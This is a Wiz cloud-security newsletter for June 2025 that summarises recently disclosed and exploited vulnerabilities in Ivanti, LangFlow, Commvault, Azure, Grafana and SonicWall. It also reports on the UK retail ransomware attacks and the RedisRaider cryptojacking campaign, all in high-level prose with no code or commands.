Wiz

Crying Out Cloud Newsletter - June 2025

This month in cloud security: from zero-day exploits in Ivanti and Commvault to critical vulnerabilities in LangFlow, Azure, and Grafana. Plus, coordinated retail attacks, RedisRaider cryptojacking, and SonicWall exploitation. Tune into Crying Out Cloud for all the insights.

Welcome back!

This month we’ve seen a lot of action, with both vulnerabilities and security incidents that have left users affected. We bring you the latest cloud security highlights, to help you stay informed and stay secure. Here are our top picks of cloud security highlights!

  

🔍 Highlights

  

Ivanti EPMM RCE Vulnerability Chain Exploited in the Wild

 On May 13th, 2025, Ivanti disclosed that Endpoint Manager Mobile (EPMM) is affected by a vulnerability chain combining an authentication bypass (CVE-2025-4427) and a post-authentication remote code execution vulnerability (CVE-2025-4428). These flaws, which stem from unsafe use of Java Expression Language in error messages and misconfigured routing, can be exploited together to achieve unauthenticated RCE. Therefore, while neither of these vulnerabilities have been assigned critical severity (their CVSS scores are 5.3 and 7.2, respectively), in combination they should certainly be treated as critical.


Ivanti has confirmed limited exploitation in-the-wild of these vulnerabilities as 0-days prior to their disclosure, and Wiz can now confirm ongoing exploitation in-the-wild of these vulnerabilities.


According to Wiz data, less than 1% of cloud environments have publicly exposed resources vulnerable to these vulnerabilities.

Learn more ❯

  

🐞 High Profile Vulnerabilities

  

RCE Vulnerability in LangFlow Exploited in-the-Wild

CVE-2025-3248, a critical remote code execution (RCE) vulnerability in the Langflow open-source platform, is now under active exploitation and has been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog. The flaw, assigned a CVSS of 9.8, allows unauthenticated attackers to execute arbitrary code through a vulnerable API endpoint and poses a severe risk to exposed instances.


According to Wiz data, less than 1% of cloud environments have resources vulnerable to CVE-2025-3248.

Learn more ❯

  

0day Vulnerability in Commvault

  

Commvault has confirmed that a nation-state actor exploited CVE-2025-3928 as a zero-day vulnerability to breach its Microsoft Azure environment. Some reports identified the attacker as Silk Typhoon. While the intrusion affected a limited number of joint customers with Microsoft, the company emphasized there was no unauthorized access to customer backup data and no material impact on services.


According to Wiz data, 7% of cloud environments have resources vulnerable to CVE-2025-3928.

Learn more ❯

  

Critical Vulnerabilities in Azure Cloud Services

  

Microsoft disclosed three critical vulnerabilities affecting core cloud services, assigned CVE-2025-29813, CVE-2025-29972 and CVE-2025-29827. One of the vulnerabilities, CVE-2025-29813, is a pipeline token hijacking vulnerability that received the highest CVSS score of 10.0. No exploitation has been observed in the wild and no user action is required.

Learn more ❯

  

High-Severity XSS Vulnerability in Grafana

  

Grafana has released emergency security patches addressing CVE-2025-4123, a high-severity cross-site scripting (XSS) vulnerability discovered in multiple supported versions of Grafana OSS and Grafana Enterprise. The flaw allows attackers to redirect users to malicious sites and execute arbitrary JavaScript code.


According to Wiz data, 23% of cloud environments have publicly exposed resources vulnerable to CVE-2025-4123.

Learn more ❯

  

🔒 Security Incidents & Campaigns

  

Coordinated Attacks on UK Retail Sector by Scattered Spider and DragonForce

  

A coordinated wave of cyberattacks has disrupted operations at major UK retailers, including Marks & Spencer (M&S), Co-op, and Harrods. The attacks have been linked to threat actors associated with Scattered Spider and the DragonForce ransomware operator, leveraging social engineering and ransomware deployment.

Learn more ❯

  

RedisRaider Linux Cryptojacking Campaign Targets Redis Servers

  

Researchers uncovered a Linux-based cryptojacking campaign dubbed RedisRaider, which targets publicly exposed and misconfigured Redis servers. The campaign uses legitimate Redis commands to execute malicious cron jobs that deploy a heavily obfuscated XMRig miner, along with anti-forensics tactics and web-based mining infrastructure to generate illicit Monero revenue.

Learn more ❯

  

SonicWall SMA Vulnerabilities Exploited in-the-Wild

  

Researchers have confirmed the active exploitation of two SonicWall SMA100 vulnerabilities: CVE-2024-38475, a pre-authentication arbitrary file read in Apache HTTP, and CVE-2023-44221, a post-authentication command injection. When chained, these flaws allow unauthenticated attackers to extract administrator session tokens and remotely execute commands on affected appliances, resulting in full system compromise. These vulnerabilities have been added to CISA’s Known Exploited Vulnerabilities (KEV) catalog.

Learn more ❯

  

🎧 Hold on to your headphones!

  

Tune in to "Crying Out Cloud", our monthly roundup of cloud security news podcast! Hosted by the talented duo Eden Naftali and Amitai Cohen 

  
Listen on Spotify and Apple Podcasts.